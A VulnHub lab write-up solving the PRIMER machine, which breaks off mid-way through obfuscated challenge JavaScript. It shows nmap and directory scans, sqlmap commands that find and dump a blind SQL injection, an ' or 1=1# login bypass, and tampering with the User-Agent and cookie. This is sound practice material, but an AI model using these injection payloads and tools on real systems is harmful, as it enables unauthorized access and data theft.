PRIMER VulnHub Writeup
After a two month break (due to PWK / OSCP), I thought it was time to get back into VulnHub. Enter, PRIMER, by Arne Rick!
Service discovery
First things first, nmap scan.
root@g0blin:/home/g0blin# nmap -T4 -A -v 192.168.1.200
Starting Nmap 6.47 ( http://nmap.org ) at 2016-03-19 15:49 GMT
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 15:50
Scanning 192.168.1.200 [1 port]
Completed ARP Ping Scan at 15:50, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:50
Completed Parallel DNS resolution of 1 host. at 15:50, 0.00s elapsed
Initiating SYN Stealth Scan at 15:50
Scanning PRIMER.lan (192.168.1.200) [1000 ports]
Discovered open port 111/tcp on 192.168.1.200
Discovered open port 22/tcp on 192.168.1.200
Discovered open port 80/tcp on 192.168.1.200
Completed SYN Stealth Scan at 15:50, 1.61s elapsed (1000 total ports)
Initiating Service scan at 15:50
Scanning 3 services on PRIMER.lan (192.168.1.200)
Completed Service scan at 15:50, 6.14s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against PRIMER.lan (192.168.1.200)
NSE: Script scanning 192.168.1.200.
Initiating NSE at 15:50
Completed NSE at 15:50, 0.20s elapsed
Nmap scan report for PRIMER.lan (192.168.1.200)
Host is up (0.0070s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-methods: OPTIONS GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_/4_8f14e45fceea167a5a36dedd4bea2543
|_http-title: PRIMER
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 49608/udp status
|_ 100024 1 52179/tcp status
MAC Address: 08:00:27:A6:48:9A (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Uptime guess: 198.048 days (since Thu Sep 3 15:40:59 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 7.03 ms PRIMER.lan (192.168.1.200)
NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds
Raw packets sent: 1212 (54.554KB) | Rcvd: 1203 (49.234KB)
So we have port 22, 80 and 111 open. Port 80 has a single denied entry in the robots.txt file - a good place to start. Before moving on, I note that it looks like a string delimited with an underscore character. The first half is 4, and the second 8f14e45fceea167a5a36dedd4bea2543. The second half resembles an MD5 hash. Hashkiller states this is the MD5 hash of the value 7.
Jumping ahead
Upon visiting the root of the web server on port 80, we're presented with a login screen with a wall of text.
Moving on to the entry from robots.txt, we're presented with another page with an odd looking string at the top. My first guess is that this is a reference to the Shellshock vulnerability, as it bares a resemblance to some of the POC for it.
Inspecting the source gives us another URL - /5_6512bd43d9caa6e02c990b0a82652dca. Again, this looks like a delimited string with a number and an MD5 hash. The first value is 5, and the second is the MD5 hash of the value 11.
Upon visiting this new URL, we're presented with another page, with another delimited string of 6_c51ce410c124a10e0db5e4b97fc2af39. The first value is 6, and the second is the MD5 hash of the value 13. As there is nothing else of interest on this page, I take an educated guess and browse to this string as a URL.
We're presented with a Basic Auth prompt, with the comment of /0=. I'm guessing the credentials for this are somehow derived from the previously discovered numbers. A dead end for now, but we may come back to this.
Running dirs3arch on the root, we get an interesting hit.
g0blin@g0blin:~$ python3 Tools/dirs3arch/dirs3arch.py -u 192.168.1.200 -e php
__
_|. _ _ _) _ _ _|_ v0.3.0
(_||| _) __)(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 3505
Target: 192.168.1.200
[16:12:03] Starting:
[16:12:18] 200 - 6KB - /index.html
[16:12:19] 200 - 1KB - /localhost.sql
[16:12:19] 302 - 0B - /login.php -> ./index.html
[16:12:19] 301 - 315B - /manual -> http://192.168.1.200/manual/
[16:12:19] 200 - 626B - /manual/index.html
[16:12:20] 200 - 59B - /robots.txt
[16:12:21] 403 - 302B - /server-status/
Task Completed
Everything else we either know about, or is of no use to us. There does however appear to be a MySQL dump file named localhost.sql.
-- phpMyAdmin SQL Dump
-- version 4.4.14
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Erstellungszeit: 24. Okt 2015 um 17:59
-- Server-Version: 5.6.26
-- PHP-Version: 5.6.12
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Datenbank: `test`
--
-- --------------------------------------------------------
--
-- Tabellenstruktur für Tabelle `users`
--
CREATE TABLE IF NOT EXISTS `users` (
`ID` int(11) NOT NULL,
`usr` varchar(32) NOT NULL,
`pw` varchar(32) NOT NULL,
`text` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Daten für Tabelle `users`
--
INSERT INTO `users` (`ID`, `usr`, `pw`, `text`) VALUES
(1, 'usr', 'pw', '');
--
-- Indizes der exportierten Tabellen
--
--
-- Indizes für die Tabelle `users`
--
ALTER TABLE `users`
ADD KEY `user_ID` (`ID`);
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
It looks like we've got a username and password within this dump. Unfortunately, these do not grant us access to the main login screen.
Moving backwards
I decide to go for a last ditch easy entry, and fire sqlmap at the login form.
g0blin@g0blin:~$ python Tools/sqlmap/sqlmap.py --threads=10 --random-agent --url="http://192.168.1.200/login.php" --data="usr=usr*&pw=pw&commit=Login"
_
___ ___| |_____ ___ ___ {1.0-dev-8d42a93}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:22:15
[16:22:15] [INFO] fetched random HTTP User-Agent header from file '/home/g0blin/Tools/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[16:22:16] [INFO] testing connection to the target URL
[16:22:16] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[16:22:16] [INFO] testing if the target URL is stable
[16:22:17] [INFO] target URL is stable
[16:22:17] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[16:22:17] [WARNING] (custom) POST parameter '#1*' does not appear dynamic
[16:22:17] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[16:22:17] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[16:22:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:22:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[16:22:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:22:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:22:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[16:22:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:22:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[16:22:20] [INFO] testing 'MySQL inline queries'
[16:22:20] [INFO] testing 'PostgreSQL inline queries'
[16:22:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:22:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[16:22:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:22:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:22:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[16:22:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[16:22:31] [INFO] (custom) POST parameter '#1*' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[16:22:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:22:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:22:43] [INFO] target URL appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[16:22:47] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[16:22:47] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 127 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: usr=usr' AND (SELECT * FROM (SELECT(SLEEP(5)))kolp) AND 'EPFD'='EPFD&pw=pw&commit=Login
---
[16:23:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[16:23:05] [INFO] fetched data logged to text files under '/home/g0blin/.sqlmap/output/192.168.1.200'
Bonza! Let's dump the contents of the database. After using the --current-db parameter to sqlmap, we confirm that we're on the test database. Using the --tables parameter tells us that there is a single table in this database named users. We proceed to dump this table with the following command.
g0blin@g0blin:~$ python Tools/sqlmap/sqlmap.py --threads=10 --random-agent --url="http://192.168.1.200/login.php" --data="usr=usr*&pw=pw&commit=Login" -Dtest -Tusers --dump
This gave us a dump of the table - bad news.
Database: test
Table: users
[1 entry]
+----+----+-----+---------+
| ID | pw | usr | text |
+----+----+-----+---------+
| 1 | pw | usr | <blank> |
+----+----+-----+---------+
The username and password match that from the MySQL dump we found (and tried) earlier.
Seeing as it's vulnerable to SQLI, I try my luck at bypassing the login form. I quickly hit upon a string that allows us to login. The below value is entered under the Username field.
' or 1=1#
We're presented with another page, the URL of which is another delimited string with the value of 1_c81e728d9d4c2f636f067f89cc14862c. The first value is 1, and the second is the MD5 hash of the value of 2.
After inspecting the source of this page, we come across an interesting comment that may help us with the Basic Auth we flopped on earlier.
<!--
This bot was looking for a Sosū User Agent Identifier she had cracked weeks ago, easy sauce, just a simple md5 hash of the first 7 digits of
pi. It was basically common knowledge to the entities moving in these areas but obscurity does create a, albeit virtual, layer of security.
-->
Great - the MD5 hash of the first 7 digits of pi.
3.141592 = d483d00d07fcc80319d170ccf07fb5be
3141592 = 29885f98ed1c9b52420df8ae83721dbc
Unfortunately, neither of these granted us access to the page we found earlier. Must be missing something.
Now wait - the text on this page mentions the '7th circle of security'. Let's try creating a delimited URL of our own, the first value being 7, and the second being the MD5 hash(es) above. Nope - 404 on both.
Reading over the hint again, I notice mention of the term User Agent. I take a stab in the dark and set my User-Agent header to d483d00d07fcc80319d170ccf07fb5be and reloaded the page. We are subsequently redirected to the URL 2_eccbc87e4b5ce2fe28308fd9f2a7baf3. The first value here is of course 2, and the second the MD5 hash of the value 3.
Unlike the other pages, this has a stylesheet included in a link tag at the relative path style.css. Within this file is the following comment.
/*Clean sessions terminate without leaving things behind. Some are cleaner than others and some are really dirty to begin with.
*Programming is an art form, even in the age of the n3t people still make mistakes.
*Sometimes, an exploit is as simple as changing a simple value in a local file.
*Piece of cake!
*/
Ok - so there is mention of sessions, and local files. I check for cookies and find that one was set named activeSession upon our initial redirection to the current page. It was set to false. Let's set that to true and see what happens. I change the value of the Cookie in Chrome using EditThisCookie, and refresh the page.
We are redirected to the URL 3_e4da3b7fbbce2345d7772b0674a318d5. The first value here is of course 3, and the second the MD5 hash of the value 5.
At the top of this page appears to be a regex rule. I take note of this for later.
There's not much of interest on this page, however there is a meta tag with the name of hint, and the value Think, but don't act like a robot.. I check for robots.txt and humans.txt files in this directory, but come up empty. The only other piece of evidence we've found pertaining to the term robots was the original deny path we found right at the start of this report.
Security by obscurity
I go back and go over my first few steps again, and then the penny drops. I've been a bit of a doofus. The Basic Auth we encountered was no Basic Auth at all. It was a piece of Javascript. After inspecting the request to the URL 6_c51ce410c124a10e0db5e4b97fc2af39, we find the following Javascript.
<SCRIPT language="JavaScript">
var X;
var L="Ikdf076";
X=prompt('/()=','');
if (X === null){window.location = "./_.php";}
if (X.substr(2,7) == L){}
else {window.location = "./_.php";}
</SCRIPT>
Entering the value __Ikdf076 into the alert allows us to view the page, unabated. Within the page, we note another underscore delimited string with the value of 7_70efdf2ec9b086079795c442636b55fb. The first value of course is 7, and the second the MD5 hash of the value 17.
Upon visiting this new URL, we're presented with an prompt with some odd text. If we hit enter, we are given a blank screen (I'll forgo the screenshot). Inspecting the source of the page reveals a sizable chunk of obfuscated Javascript.
<SCRIPT language="JavaScript">
var _0x5cf4=["","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x73\x70\x6C\x69\x74","\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65\x66","\x6A\x6F\x69\x6E","\x68\x65\x6C\x6C\x6F","\x35\x64\x34\x31\x34\x30\x32\x61\x62\x63\x34\x62\x32\x61\x37\x36\x62\x39\x37\x31\x39\x64\x39\x31\x31\x30\x31\x37\x63\x35\x39\x32","\x30\x64\x32\x38\x63\x62\x61\x30\x62\x64\x34\x66\x32\x36\x65\x31\x36\x64\x37\x36\x36\x30\x30\x30\x64\x32\x37\x65\x34\x39\x66\x61","\xA7\x23\x2F\x24","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x2E\x2F\x5F\x2E\x70\x68\x70","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6C\x6F\x61\x64\x69\x6E\x67","\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x20\x20\x20\x20\x3C\x63\x65\x6E\x74\x65\x72\x3E\x20\x20\x20\x20\x20\x20\x3C\x68\x31\x3E\x5B\x2B\x2B\x51\x2B\x2B\x2B\x2B\x2B\x2B\x5D\x3C\x2F\x68\x31\x3E\x20\x20\x20\x20\x3C\x2F\x63\x65\x6E\x74\x65\x72\x3E\x20\x20\x20\x20\x3C\x70\x3E\x20\x20\x20\x20\x20\x20\x53\x68\x65\x20\x77\x61\x73\x20\x6E\x6F\x20\x6C\x6F\x6E\x67\x65\x72\x20\x73\x75\x72\x65\x20\x77\x68\x61\x74\x20\x68\x65\x72\x20\x6F\x72\x69\x67\x69\x6E\x61\x6C\x20\x61\x73\x73\x69\x67\x6E\x6D\x65\x6E\x74\x20\x68\x61\x64\x20\x62\x65\x65\x6E\x2E\x20\x42\x75\x74\x20\x69\x74\x20\x64\x69\x64\x6E\x27\x74\x20\x6D\x61\x74\x74\x65\x72\x20\x61\x6E\x79\x77\x61\x79\x2E\x20\x57\x68\x61\x74\x20\x73\x74\x69\x6C\x6C\x20\x6D\x61\x74\x74\x65\x72\x65\x64\x20\x77\x61\x73\x20\x67\x65\x74\x74\x69\x6E\x67\x20\x6F\x75\x74\x20\x6F\x66\x20\x68\x65\x72\x65\x2C\x20\x61\x6C\x69\x76\x65\x2E\x20\x20\x20\x20\x20\x20\x4C\x6F\x67\x20\x6F\x75\x74\x2C\x20\x74\x65\x6C\x6C\x20\x74\x68\x65\x20\x63\x6C\x69\x65\x6E\x74\x20\x74\x6F\x20\x67\x6F\x20\x66\x75\x63\x6B\x20\x68\x69\x6D\x73\x65\x6C\x66\x20\x61\x6E\x64\x20\x67\x65\x74\x20\x61\x20\x66\x69\x78\x20\x6F\x66\x20\x6E\x30\x69\x73\x65\x20\x74\x6F\x20\x73\x68\x75\x74\x20\x6F\x66\x66\x20\x68\x65\x72\x20\x6D\x69\x6E\x64\x2E\x20\x52\x65\x6C\x61\x78\x20\x77\x69\x74\x68\x20\x61\x20\x6D\x69\x6E\x64\x6C\x65\x73\x73\x20\x68\x6F\x6C\x6F\x20\x66\x6C\x69\x63\x6B\x20\x61\x6E\x64\x20\x6E\x65\x76\x65\x72\x20\x6C\x6F\x6F\x6B\x20\x62\x61\x63\x6B\x20\x61\x74\x20\x74\x68\x69\x73\x20\x77\x65\x69\x72\x64\x20\x6A\x6F\x62\x2E\x20\x20\x20\x20\x3C\x2F\x70\x3E\x20\x20\x20\x20\x3C\x70\x3E\x20\x20\x20\x20\x20\x20\x41\x20\x76\x69\x6F\x6C\x65\x6E\x74\x20\x6E\x65\x6F\x6E\x20\x66\x6C\x69\x63\x6B\x65\x72\x20\x61\x70\x70\x65\x61\x72\x65\x64\x20\x61\x74\x20\x74\x68\x65\x20\x68\x6F\x72\x69\x7A\x6F\x6E\x2E\x20\x4E\x6F\x20\x74\x68\x75\x6E\x64\x65\x72\x20\x66\x6F\x6C\x6C\x6F\x77\x65\x64\x2E\x3C\x62\x72\x3E\x20\x20\x20\x20\x20\x20\x53\x68\x65\x20\x73\x74\x61\x72\x65\x64\x20\x69\x6E\x20\x74\x68\x65\x20\x64\x69\x73\x74\x61\x6E\x63\x65\x20\x77\x69\x74\x68\x20\x61\x20\x62\x6C\x61\x6E\x6B\x20\x65\x78\x70\x72\x65\x73\x73\x69\x6F\x6E\x2E\x20\x20\x20\x20\x3C\x2F\x70\x3E\x20\x20\x20\x20\x3C\x70\x3E\x20\x20\x20\x20\x20\x20\x22\x48\x65\x6C\x6C\x6F\x2C\x20\x4E\x69\x65\x76\x65\x2E\x22\x20\x41\x20\x64\x65\x65\x70\x2C\x20\x66\x65\x6D\x69\x6E\x69\x6E\x65\x2C\x20\x64\x69\x67\x69\x74\x61\x6C\x20\x76\x6F\x69\x63\x65\x20\x72\x6F\x61\x72\x65\x64\x20\x69\x6E\x20\x68\x65\x72\x20\x68\x65\x61\x64\x2E\x3C\x62\x72\x3E\x20\x20\x20\x20\x20\x20\x46\x55\x43\x4B\x21\x20\x54\x68\x69\x73\x20\x77\x61\x73\x20\x68\x65\x72\x20\x72\x65\x61\x6C\x20\x6E\x61\x6D\x65\x2E\x20\x53\x68\x65\x20\x68\x61\x64\x6E\x27\x74\x20\x75\x73\x65\x64\x20\x69\x74\x20\x69\x6E\x20\x79\x65\x61\x72\x73\x2E\x2E\x2E\x20\x20\x20\x20\x3C\x2F\x70\x3E\x20\x20\x20\x20\x3C\x70\x3E\x20\x20\x20\x20\x20\x20\x22\x49\x20\x77\x69\x6C\x6C\x20\x6C\x6F\x67\x6F\x75\x74\x20\x61\x6E\x64\x20\x73\x74\x6F\x70\x20\x74\x68\x69\x73\x20\x73\x68\x69\x74\x20\x72\x69\x67\x68\x74\x20\x66\x75\x63\x6B\x69\x6E\x67\x20\x6E\x6F\x77\x21\x22\x20\x53\x68\x65\x20\x73\x63\x72\x65\x61\x6D\x65\x64\x20\x69\x6E\x74\x6F\x20\x74\x68\x65\x20\x6E\x65\x6F\x6E\x20\x65\x78\x70\x61\x6E\x73\x65\x2E\x3C\x62\x72\x3E\x20\x20\x20\x20\x20\x20\x4E\x6F\x74\x68\x69\x6E\x67\x2E\x20\x20\x20\x20\x3C\x2F\x70\x3E\x20\x20\x20\x20\x3C\x70\x3E\x20\x20\x20\x20\x20\x20\x53\x68\x65\x20\x64\x69\x64\x6E\x27\x74\x2E\x20\x53\x6F\x6D\x65\x74\x68\x69\x6E\x67\x20\x62\x65\x73\x69\x64\x65\x20\x74\x68\x65\x20\x66\x65\x61\x72\x20\x6F\x63\x63\x75\x70\x69\x65\x64\x20\x68\x65\x72\x20\x6D\x69\x6E\x64\x2E\x20\x49\x74\x20\x68\x61\x64\x20\x62\x65\x65\x6E\x20\x74\x68\x65\x72\x65\x20\x73\x69\x6E\x63\x65\x20\x74\x68\x65\x20\x73\x65\x63\x6F\x6E\x64\x20\x6E\x6F\x64\x65\x20\x61\x6E\x64\x20\x67\x72\x65\x77\x20\x73\x74\x72\x6F\x6E\x67\x65\x72\x20\x77\x69\x74\x68\x20\x65\x76\x65\x72\x79\x20\x6D\x6F\x76\x65\x2E\x20\x54\x68\x65\x72\x65\x20\x77\x61\x73\x20\x61\x20\x70\x61\x74\x74\x65\x72\x6E\x20\x69\x6E\x20\x74\x68\x65\x20\x70\x61\x74\x68\x20\x73\x68\x65\x20\x68\x61\x64\x20\x74\x61\x6B\x65\x6E\x20\x74\x68\x72\x6F\x75\x67\x68\x20\x74\x68\x65\x20\x6E\x65\x74\x77\x6F\x72\x6B\x2E\x20\x41\x6E\x20\x61\x72\x74\x69\x66\x69\x63\x69\x61\x6C\x20\x70\x61\x74\x74\x65\x72\x6E\x2C\x20\x6C\x61\x79\x65\x64\x20\x6F\x75\x74\x20\x62\x79\x20\x73\x6F\x6D\x65\x6F\x6E\x65\x20\x6F\x72\x20\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x2E\x3C\x62\x72\x3E\x20\x20\x20\x20\x20\x20\x54\x68\x65\x72\x65\x20\x77\x61\x73\x20\x6E\x6F\x20\x68\x69\x6E\x74\x2C\x20\x6E\x6F\x20\x6F\x62\x76\x69\x6F\x75\x73\x20\x73\x74\x65\x70\x2E\x20\x46\x69\x6E\x64\x69\x6E\x67\x20\x74\x68\x65\x20\x6E\x65\x78\x74\x20\x6E\x6F\x64\x65\x20\x77\x6F\x75\x6C\x64\x20\x62\x65\x20\x74\x68\x65\x20\x63\x68\x61\x6C\x6C\x65\x6E\x67\x65\x2C\x20\x6F\x72\x20\x6D\x61\x79\x62\x65\x20\x6D\x6F\x72\x65\x20\x6C\x69\x6B\x65\x20\x61\x20\x74\x65\x73\x74\x2E\x20\x20\x20\x20\x3C\x2F\x70\x3E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x66\x6F\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64"];
/*"Someone didn't bother reading my carefully prepared memo on commonly-used passwords. Now, then, as I so meticulously pointed out, the four most-used passwords are: love, sex, secret, and..." - The Plague*/
function md5cycle(_0xf6a0x2,_0xf6a0x3){var _0xf6a0x4=_0xf6a0x2[0],_0xf6a0x5=_0xf6a0x2[1],_0xf6a0x6=_0xf6a0x2[2],_0xf6a0x7=_0xf6a0x2[3];_0xf6a0x4=ff(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[0],7,-680876936);_0xf6a0x7=ff(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[1],12,-389564586);_0xf6a0x6=ff(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[2],17,606105819);_0xf6a0x5=ff(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[3],22,-1044525330);_0xf6a0x4=ff(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[4],7,-176418897);_0xf6a0x7=ff(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[5],12,1200080426);_0xf6a0x6=ff(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[6],17,-1473231341);_0xf6a0x5=ff(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[7],22,-45705983);_0xf6a0x4=ff(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[8],7,1770035416);_0xf6a0x7=ff(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[9],12,-1958414417);_0xf6a0x6=ff(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[10],17,-42063);_0xf6a0x5=ff(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[11],22,-1990404162);_0xf6a0x4=ff(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[12],7,1804603682);_0xf6a0x7=ff(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[13],12,-40341101);_0xf6a0x6=ff(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[14],17,-1502002290);_0xf6a0x5=ff(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[15],22,1236535329);_0xf6a0x4=gg(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[1],5,-165796510);_0xf6a0x7=gg(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[6],9,-1069501632);_0xf6a0x6=gg(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[11],14,643717713);_0xf6a0x5=gg(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[0],20,-373897302);_0xf6a0x4=gg(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[5],5,-701558691);_0xf6a0x7=gg(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[10],9,38016083);_0xf6a0x6=gg(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[15],14,-660478335);_0xf6a0x5=gg(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[4],20,-405537848);_0xf6a0x4=gg(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[9],5,568446438);_0xf6a0x7=gg(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[14],9,-1019803690);_0xf6a0x6=gg(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[3],14,-187363961);_0xf6a0x5=gg(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[8],20,1163531501);_0xf6a0x4=gg(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[13],5,-1444681467);_0xf6a0x7=gg(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[2],9,-51403784);_0xf6a0x6=gg(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[7],14,1735328473);_0xf6a0x5=gg(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[12],20,-1926607734);_0xf6a0x4=hh(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[5],4,-378558);_0xf6a0x7=hh(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[8],11,-2022574463);_0xf6a0x6=hh(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[11],16,1839030562);_0xf6a0x5=hh(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[14],23,-35309556);_0xf6a0x4=hh(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[1],4,-1530992060);_0xf6a0x7=hh(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[4],11,1272893353);_0xf6a0x6=hh(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[7],16,-155497632);_0xf6a0x5=hh(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[10],23,-1094730640);_0xf6a0x4=hh(_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x3[13],4,681279174);_0xf6a0x7=hh(_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x6,_0xf6a0x3[0],11,-358537222);_0xf6a0x6=hh(_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x5,_0xf6a0x3[3],16,-722521979);_0xf6a0x5=hh(_0xf6a0x5,_0xf6a0x6,_0xf6a0x7,_0xf6a0x4,_0xf6a0x3[6],